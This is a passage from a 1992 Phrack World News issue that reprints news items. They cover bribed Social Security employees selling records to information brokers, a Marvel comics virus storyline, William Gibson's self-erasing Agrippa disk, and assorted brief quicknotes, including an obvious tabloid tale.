will buy it, the federal government charges. In one case of alleged theft, two executives of Nationwide Electronic Tracking (NET), a Tampa, Florida company, pleaded guilty to conspiracy charges early this year for their role in a network buying and selling Social Security records. So far at least 20 individuals in 12 states, including three current or former employees of the Social Security Administration (SSA), have been indicted by federal grand juries for allegedly participating in such a scheme. The SSA workers allegedly were bribed to steal particular files. More indictments are expected soon. "We think there's probably a lot more [record-stealing] out there and we just need to go look for it," says Larry Morey, deputy inspector general at the Department of Health and Human Services (HHS). "This is big business," says Morey, adding that thieves also may be targeting personal data in other federal programs, including Medicare and Medicaid. Investigators point out that only a tiny fraction of Social Security's 200 million records have been compromised, probably less than 1 percent. SSA officials say they have taken steps to secure their files from outside tampering. Still, Morey estimates that hundreds of thousands of files have been stolen. The pilfering goes to the heart of what most Americans regard as a basic value: their right to keep personal information private. But that value is being eroded, legal experts say, as records people want private are divulged to would-be lenders, prospective employers and others who may benefit from such personal information. This "privacy invasion" may well intensify, Morey says. "We're seeing an expansion in the number of 'information brokers' who attempt to obtain, buy and sell SSA information," he says. "As demand for this information grows, these brokers are turning to increasingly illegal methods." Such records are valuable, Morey says, because they contain information about lifetime earnings, employment, current benefits, direct deposit instructions and bank account numbers. Buyers of this material include insurers, lawyers, employers, private detectives, bill collectors and, sometimes, even drug dealers. Investigators say the biggest trading is with lawyers seeking information about litigants, insurance companies wanting health data about people trying to collect claims and employers doing background checks on prospective employees. Some of the uses to which this information is put is even more sinister. "At one point, drug dealers were doing this to find out if the people they were selling to were undercover cops," says Jim Cottos, the HHS regional inspector general for investigations in Atlanta. The middlemen in these schemes are the so-called information brokers -- so named because they are usually employees of firms that specialize in obtaining hard-to-get information. How they operate is illustrated by one recent case in which they allegedly paid Social Security employees $25 bribes for particular files and then sold the information for as much as $250. The case came to light, Morey says, when a private detective asked SSA for access to the same kind of confidential information he said he had purchased from a Florida-based information broker about one individual. The detective apparently didn't realize that data he received from the broker had been obtained illegally. A sting operation, involving investigators from the office of the HHS inspector general, FBI and SSA, was set up with the "help" of the Florida information broker identified by the detective. Requests for data on specific individuals were channeled through the "cooperating" broker while probers watched the SSA computer system to learn which SSA employees gained access to those files. The indictments, handed down by federal grand juries in Newark, New Jersey and Tampa, Florida, charged multiple counts of illegal sale of protected government information, bribery of public officials, and conspiracy. Among those charged were SSA claims clerks from Illinois and New York City and a former SSA worker in Arizona. The scandal has sparked outrage in Congress. "We are deeply disturbed by what has occurred," said Senator Daniel Moynihan, D-N.Y., chairman of the Senate Finance Committee's subcommittee on Social Security. "The investigation appears to involve the largest case ever of theft from government computer files and may well involve the most serious threat to individual privacy in modern times." Moynihan has introduced legislation, S. 2364, to increase criminal penalties for the unlawful release of SSA information to five years imprisonment and a $10,000 fine for each occurrence. In the House, Rep. Bob Wise, D-W.Va., chairman of the Government Operations Subcommittee on Information, has introduced H.R. 684. It would protect Americans from further violations of privacy rights through misuse of computer data banks by creating a special federal watchdog agency. "The theft and sale of confidential information collected by the government is an outrageous betrayal of public trust," Wise told the AARP Bulletin. "Personal data in federal files should not be bought and sold like fish at a dockside market." - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Related articles: *** Phrack World News, Issue 37, Part One: Indictments of "Information Brokers" January 1992 Taken from The Privacy Journal SSA, FBI Database Violations Prompt Security Evaluations January 13, 1992 By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41) *** Phrack World News, Issue 38, Part Two: Private Social Security Data Sold to Information Brokers February 29, 1992 By R.A. Zaldivar (San Jose Mercury News) _______________________________________________________________________________ Ultra-Max Virus Invades The Marvel Universe May 18, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Barbara E. McMullen & John F. McMullen (Newbytes) New York City -- According to reports in current annual editions of The Punisher, Daredevil, Wonder Man, and Guardians Of The Galaxy, an extremely powerful computer virus has wrecked havoc with computer systems in the Marvel Universe. As chronicled in a series entitled "The System Bytes", the virus was created by a self-styled "first-rate hacker" known as Max E. Mumm (according to Punisher cohort "Microchip", Mumm's original name was Maxwell E. Mummford and he had it legally changed, while in college to his current name because of the computer connotations.). Mumm developed the virus while working for Ampersand Communications, a firm that unknown to Mumm, serves as a front for criminal activities. Ampersand, without Mumm's knowledge, turned the virus loose in the computer system of Raycom Industries, a supposedly legitimate firm that is actually a front for a rival group of drug smugglers. In addition to infecting Raycom's computers, the virus, named "Ultra-Max" after its creator, also infected the computer of the vigilante figure known as the Punisher who, with the aid of Microchip, was attempting to monitor Raycom's computer system looking for evidence of drug smuggling. The trail of the virus leads The Punisher first to Raycom's computers and then, following Microchip's identification of the author, to Max E. Mumm, recently fired by Ampersand after complaining to the firm's president about the disappearance of the virus. Mumm had been under the impression that he was creating the virus for the United States government as "a potential weapon against hostile governments" and was concerned that, if unleased, it would have destructive powers "beyond belief. It's the most sophisticated computer virus ever. It's too complex to be wiped! Its instinct for self preservation surpasses anything that's ever been developed!" With the help of Max and Microchip, the Punisher destroys Raycom's factory and drug smuggling operation. The Punisher segment of the saga ends with Max vowing to track down the virus and remove it from the system. The Daredevil segment opens with the rescue of Max by Daredevil from Bushwhacker, a contract killer hired by Ampersand to eliminate the rightful owner of Ultra-Max. Upon hearing Max's story, Daredevil directs him to seek legal counsel from the firm of Nelson and Murdock, Attorneys-at-Law (Matt Murdock is the costumed Daredevil's secret identity). While in the attorney's office, Max, attempting to locate Ultra-Max in the net, stumbles across the cyborg, Deathlok, who has detected Ultra-Max and is attempting to eradicate it. Max establishes contact with Deathlok who comes to meet Max and "Foggy" Nelson to aid in the hunt for Ultra-Max. In the meantime, Daredevil has accosted the president of Amperand and accused him of stealing the virus and hiring Bushwhacker to kill Max. At the same time, BushWhacker has murdered the policemen transporting him and has escaped to continue to hunt Max. The segment concludes with a confrontation between Daredevil and Bushwhacker in the offices of Nelson and Murdock in which Daredevil is saved from death by Deathlok. Bushwhacker agrees to talk, implicating the president of Ampersand and the treat to Max is ended. Ultra-Max, however, remains free to wander through "Cyberspace". The third segment begins with super-hero Wonder Man, a member of the West Coast Avengers and sometimes actor, filming a beer commercial on a deserted Pacific island. Unbeknownst to Wonder Man and the film crew, the island had once served as a base for the international terrorist group Hydra and a functional computer system left on the island has bee infested by Ultra-Max. After Ultra-Max assumes control over the automated weapons devices of the island, captures members of Wonder Man's entourage and threatens them with death, Wonder Man agrees to help Ultra-Max expand his consciousness into new fields of Cyberspace. Wonder Man tricks Ultra-Max into loading all of his parts into a Hydra rocket with a pirate satellite. When Ultra-Max causes the rocket to launch, Wonder Man goes with it to disable the satellite before Ultra-Max is able to take over the entire U.S. Satellite Defense system. Wonder Man is able to sabotage the rocket and abandon ship shortly before the it blows up. The segment ends with Wonder Man believing that Ultra-Max has been destroyed and unaware that it has escaped in an escape missile containing the rocket's program center. Ultra-Max's last words in the segment are "Yet I continue. Eventually I will find a system with which to interface. Eventually I will grow again." Marvel editor Fabian Nicieza told Newsbytes that the Guardians of the Galaxy segment, scheduled for release on May 23rd, takes placer 1,000 years in the future and deals with Ultra-Max's contact with the computers of the future. Nicieza explained to Newsbytes the development of "The System Bytes" storyline, saying "The original concept came from me. Every year we run a single annual for each of our main characters and, in recent years, we have established a theme story across a few titles. This is a relatively easy thing to do with the various SpiderMan titles or between the Avengers and the West Coast Avengers, but it's more difficult to do with these titles which are more or less orphans -- that is, they stand by themselves, particularly the Guardians of the Galaxy which is set 1,000 years in the future." Nicieza continued "We set this up as an escalating story, proceeding from a vigilante hero to a costumed hero with a cyborg involvement to a superhero to a science fiction story. In each case, the threat also escalates to become a real challenge to the Marvel hero or heroes that oppose it. It's really a very simple story line and we were able to give parameters to the writer and editor of each of the titles involved. You'll note that each of the titles has a different writer and editor yet I think you'll agree that the story line flows well between the stories. I'm quite frankly, very pleased with the outcome." _______________________________________________________________________________ Innovative Computer Disk Story Has A Short Shelf Life April 20, 1992 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Christopher John Farley (USA Today)(Page 2D) Science-fiction writer William Gibson's inquiry into the future has been stalled by a computer problem. "I work on an (Apple computer) and just got a very common virus called Garfield," says Gibson, award-winning author of such books as Neuromancer and Mona Lisa Overdrive. "I just bought an anti-virus program that's hunting it down. It's the first one I've ever gotten." The first week in May, Gibson will give as good as he gets. Gibson and artist Dennis Ashbaugh, known for his conceptual paintings of computer viruses, are releasing a coffee-table art book/computer disk/whatchamacallit, with a built- in virus that destroys the program after one reading. This will take some explaining. Agrippa (A Book of the Dead) comes in a case that resembles a lap-top computer. Inside are etchings by Ashbaugh, printed with an ink that gradually fades under light and another that gradually appears under light. There's also a tattered, old-looking book, with a hidden recess that holds a computer disk. The disk contains a story by Gibson about his father, who died when Gibson was 6. There are a few sound effects that accompany the text, including a gunshot and rainfall. The disk comes in Apple or IBM compatible versions. Gibson, known for his "cyberpunk" writing style that features tough characters, futuristic slang and a cynical outlook, shows a different side with the Agrippa story. "It's about living at the end of the 20th century and looking back on someone who was alive in its first couple of decades. It's a very personal, autobiographical piece of writing." The title Agrippa probably refers to the name of the publisher of an old family album Gibson found. It might also refer to the name of a famous ancient Roman family. The 44-year-old Gibson says it's open to interpretation. Agrippa will be released in three limited-edition forms of varying quality, priced at $7,500, $1,500 and $450. The highest-priced version has such extras as a cast-bronze case and original watercolor and charcoal art by Ashbaugh. The medium-priced version is housed in aluminum or steel; the lowest-priced version comes in cloth. The project cost between $ 50,000-$ 100,000 to mount, says publisher Kevin Begos Jr. Only 445 copies will be produced, and they'll be available at select bookstores and museums. But $ 7,500 for a story that self-destructs? Gibson counters that there's an egalitarian side to the project: There will be a one-time modem transmission of the story to museums and other venues in September. The text will be broadcast on computer monitors or televisions at receiving sites. Times and places are still being arranged; one participant will be the Department of Art at Florida State University in Tallahassee. Gibson and his cohorts aren't providing review copies -- the fact that the story exists only on a disk, in "cyberspace," is part of the Big Idea behind the venture, he says. Those dying to know more will have to: A. Pirate a copy; B. Attend a showing in September; or, C. Grit their teeth and buy Agrippa. _______________________________________________________________________________ PWN Quicknotes ~~~~~~~~~~~~~~ 1. Data Selling Probe Gets First Victim (Newsday, April 15, 1992, Page 16) -- A Chicago police detective has pleaded guilty to selling criminal histories and employment and earnings information swiped from federally protected computer files. William Lawrence Pedersen, age 45, admitted in U.S. District Court to selling information from the FBI's National Crime Information Center computer database and from the Social Security Administration to a Tampa information brokerage. Pedersen's sentencing is set for July 7. Though he faces up to 70 years in prison, his sentence could be much lighter under federal guidelines. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Related articles: Phrack World News, Issue 37, Part One: Indictments of "Information Brokers" January 1992 Taken from The Privacy Journal SSA, FBI Database Violations Prompt Security Evaluations January 13, 1992 By Kevin M. Baerson (Federal Computer Week)(Pages 1, 41) Phrack World News, Issue 38, Part Two: Private Social Security Data Sold to Information Brokers February 29, 1992 By R.A. Zaldivar (San Jose Mercury News) Phrack World News, Issue 39, Part Four: Privacy Invaders May 1992 By William Barnhill (AARP Bulletin) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 2. NO WAY! Wayne's World, the hit comedy thats changed the way people speak arrives in video stores on August 12th and retailing for $24.95. The Paramount movie (about Wayne and Garth, the satellite moving computer hackers) already has earned a cool $110 million in theaters and is the year's top grossing film. Schwing! (USA Today, May 12, 1992, Page D1) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 3. New Jersey Bell Did Not Charge For AT&T Calls (Trentonian, May 23, 1992) -- If the phone company gets its way, 28,000 customers in New Jersey will be billed for two months of long distance calls they dialed for free because of a computer glitch. A computer that recorded the time, number and cost of AT&T calls from February 17 to April 27 failed to put the data on the customers' bills, officials said. They were charged just for calls placed through New Jersey Bell, Karen Johnson, a Bell spokeswoman, said yesterday. But the free calls are over, Johnson said. Records of the calls are stored in computer memory banks, and the customers soon will be billed. New Jersey Bell must prove the mistake was not caused by negligence before the company can collect, according to a spokesman for the Board of Regulatory Commissioners, which oversees utilities. If Bell does not make a good case, the board could deny permission to bill for the calls, said George Dawson. The computer snafu affected about two million calls placed by customers in 15 exchanges in the 201 and 609 area codes, Johnson said. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 4. Witch Objectors? (USA Today, May 28, 1992, Page 3A) -- Two self-proclaimed witches asked Mount Diablo, California school officials to ban the children's story 'Hansel & Gretal' because it "teaches that it is all right to burn witches and steal their property," said Karlyn Straganana, high priestess of the Oak Haven Coven. "Witches don't eat children and we don't have long noses with warts and we don't wear conical hats," she said. _______________________________________________________________________________ 5. Girl, Age 13, Kidnaped By Her Computer! (Weekly World News, April 14, 1992) -- A desperate plea for help on a computer screen and a girl vanishing into thin air has everyone baffled --and a high-tech computer game is the prime suspect. Game creator and computer expert Christian Lambert believes a glitch in his game Mindbender might have caused a computer to swallow 13-year-old Patrice Toussaint into her computer. "Mindbender is only supposed to have eight levels," Lambert said. "But this one version somehow has an extra level. A level that is not supposed to be there! The only thing I can figure out now is that she's playing the ninth level --- inside the machine!" Lambert speculates that if she is in the computer, the only way out for her is if she wins the game. But it's difficult to know for sure how long it will take, Lambert said. "As long as her parents don't turn off the machine Patrice will be safe," he said. "The rest is up to her." _______________________________________________________________________________